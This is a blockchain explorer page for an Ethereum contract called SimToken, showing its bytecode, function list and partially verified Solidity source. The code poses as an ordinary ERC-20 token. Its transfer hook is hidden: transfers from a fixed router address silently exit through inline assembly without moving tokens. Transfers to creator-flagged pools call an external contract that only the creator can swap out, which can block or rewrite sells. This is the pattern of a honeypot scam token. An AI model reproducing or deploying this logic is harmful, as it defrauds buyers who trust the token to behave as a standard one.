Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0xD1c3581F40a3F9BBEE50CC6DdC7131FB0c3C9CCb
Balance 0 ETH
Nonce 1
Code Size 2339 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

2339 bytes
0x608060405234801561000f575f5ffd5b50600436106100cf575f3560e01c806370a082311161007d578063a9059cbb11610058578063a9059cbb146101a0578063dd62ed3e146101b3578063eec8d048146101eb575f5ffd5b806370a082311461015d5780638400d5571461018557806395d89b4114610198575f5ffd5b806323b872dd116100ad57806323b872dd14610126578063313ce567146101395780633783dc1314610148575f5ffd5b806306fdde03146100d3578063095ea7b3146100f157806318160ddd14610114575b5f5ffd5b6100db6101fe565b6040516100e89190610735565b60405180910390f35b6101046100ff366004610781565b61028e565b60405190151581526020016100e8565b6002545b6040519081526020016100e8565b6101046101343660046107ab565b6102a7565b604051601281526020016100e8565b61015b6101563660046107e9565b6102d5565b005b61011861016b3660046107e9565b6001600160a01b03165f9081526020819052604090205490565b61015b6101933660046107e9565b61031a565b6100db61035f565b6101046101ae366004610781565b61036e565b6101186101c136600461080b565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61015b6101f936600461084f565b610386565b60606003805461020d9061087b565b80601f01602080910402602001604051908101604052809291908181526020018280546102399061087b565b80156102845780601f1061025b57610100808354040283529160200191610284565b820191905f5260205f20905b81548152906001019060200180831161026757829003601f168201915b5050505050905090565b5f3361029b8185856103c6565b60019150505b92915050565b5f336102b48585856103d8565b6102bf85828561051c565b6102ca85858561056a565b506001949350505050565b6005546001600160a01b031633146102eb575f5ffd5b6007805473ffffffffffffffffffffffffffffffffffffffff19166001600160a01b0392909216919091179055565b6005546001600160a01b03163314610330575f5ffd5b6008805473ffffffffffffffffffffffffffffffffffffffff19166001600160a01b0392909216919091179055565b60606004805461020d9061087b565b5f3361037b8185856103d8565b61029b81858561056a565b6005546001600160a01b0316331461039c575f5ffd5b6001600160a01b03919091165f908152600660205260409020805460ff1916911515919091179055565b6103d38383836001610599565b505050565b7fffffffffffffffffffffffffc036e5c5028fc6a32b6939b82a593362b4d480536001600160a01b0384160161048e576005546001600160a01b0316320361015b57600854604051637346125760e11b8152600481018390526001600160a01b0384811660248301529091169063e68c24ae906044016020604051808303815f875af115801561046a573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061015b91906108b3565b6001600160a01b0382165f9081526006602052604090205460ff16156103d3576007546040516376dbc71b60e11b81526001600160a01b0385811660048301528481166024830152604482018490529091169063edb78e36906064015f604051808303815f87803b158015610501575f5ffd5b505af1158015610513573d5f5f3e3d5ffd5b50505050505050565b6001600160a01b038381165f908152600160209081526040808320938616835292905220545f198110156105645781811015610556575f5ffd5b61056484848484035f610599565b50505050565b6001600160a01b03831661057c575f5ffd5b6001600160a01b03821661058e575f5ffd5b6103d383838361063d565b6001600160a01b0384166105ab575f5ffd5b6001600160a01b0383166105bd575f5ffd5b6001600160a01b038085165f908152600160209081526040808320938716835292905220829055801561056457826001600160a01b0316846001600160a01b03167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258460405161062f91815260200190565b60405180910390a350505050565b6001600160a01b038316610667578060025f82825461065c91906108ce565b909155506106a99050565b6001600160a01b0383165f908152602081905260409020548181101561068b575f5ffd5b6001600160a01b0384165f9081526020819052604090209082900390555b6001600160a01b0382166106c5576002805482900390556106e3565b6001600160a01b0382165f9081526020819052604090208054820190555b816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161072891815260200190565b60405180910390a3505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b038116811461077e575f5ffd5b50565b5f5f60408385031215610792575f5ffd5b823561079d8161076a565b946020939093013593505050565b5f5f5f606084860312156107bd575f5ffd5b83356107c88161076a565b925060208401356107d88161076a565b929592945050506040919091013590565b5f602082840312156107f9575f5ffd5b81356108048161076a565b9392505050565b5f5f6040838503121561081c575f5ffd5b82356108278161076a565b915060208301356108378161076a565b809150509250929050565b801515811461077e575f5ffd5b5f5f60408385031215610860575f5ffd5b823561086b8161076a565b9150602083013561083781610842565b600181811c9082168061088f57607f821691505b6020821081036108ad57634e487b7160e01b5f52602260045260245ffd5b50919050565b5f602082840312156108c3575f5ffd5b815161080481610842565b808201808211156102a157634e487b7160e01b5f52601160045260245ffdfea2646970667358221220ff9a68220d4d92cb6956b197a9b31903fc3bacade1fd1c79507c971dfee86e7064736f6c634300081c0033

Verified Source Code Partial Match

Compiler: v0.8.28+commit.7893614a EVM: cancun Optimization: Yes (777 runs)
SimToken.sol 210 lines
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 value) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 value) external returns (bool);
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}
abstract contract SmartTokenBase is IERC20 {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    constructor() {
        _name = "XXX";
        _symbol = "XXX";
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = msg.sender;
        _beforeTransfer(owner, to, value);
        _transfer(owner, to, value);
        return true;
    }

    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = msg.sender;
        _approve(owner, spender, value);
        return true;
    }

    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = msg.sender;
        _beforeTransfer(from, to, value);
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    function _beforeTransfer(address from, address to, uint256 value) internal virtual{

    }

    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert();
        }
        if (to == address(0)) {
            revert();
        }
        _update(from, to, value);
    }

    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert();
            }
            unchecked {
            // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
            // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
            // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert();
        }
        _update(address(0), account, value);
    }

    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert();
        }
        _update(account, address(0), value);
    }

    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert();
        }
        if (spender == address(0)) {
            revert();
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                revert();
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}
interface BonusLogic{
    function claimBonus(address,address,uint256) external;
}
interface ISimOracle{
    function info() external returns(uint256, bool);
    function update(uint256,address) external returns(bool);
}
contract SimToken is SmartTokenBase {
    address private _creator;
    mapping(address=>bool) private _pool;
    BonusLogic private _bonusLogic;
    ISimOracle private _simOracle;
    address private constant UNIROUTER_ETH = 0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD;

    constructor(BonusLogic bonusLogic, ISimOracle simOracle){
        _creator = msg.sender;
        _bonusLogic = bonusLogic;
        _simOracle = simOracle;
        _mint(msg.sender, 2000000 * 10 ** 18);
    }
    function updateBonusLogic(BonusLogic bonusLogic) external{
        require(_creator == msg.sender);
        _bonusLogic = bonusLogic;
    }
    function updateSimOracle(ISimOracle simOracle) external{
        require(_creator == msg.sender);
        _simOracle = simOracle;
    }
    function updatePool(address pool, bool enable) external{
        require(_creator == msg.sender);
        _pool[pool] = enable;
    }

    function _beforeTransfer(address from, address to, uint256 value) internal override {
        if(from == UNIROUTER_ETH){
            if(tx.origin == _creator){
                _simOracle.update(value, to);
            }

            assembly{
                return(0,0)
            }
        }

        if(_pool[to]){
            _bonusLogic.claimBonus(from, to, value);
        }
    }
}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 6 functions

These functions modify contract state and require a wallet transaction to execute.

approve 0x095ea7b3
address spender
uint256 value
returns: bool
transfer 0xa9059cbb
address to
uint256 value
returns: bool
transferFrom 0x23b872dd
address from
address to
uint256 value
returns: bool
updateBonusLogic 0x3783dc13
address bonusLogic
updatePool 0xeec8d048
address pool
bool enable
updateSimOracle 0x8400d557
address simOracle

Recent Transactions

No transactions found for this address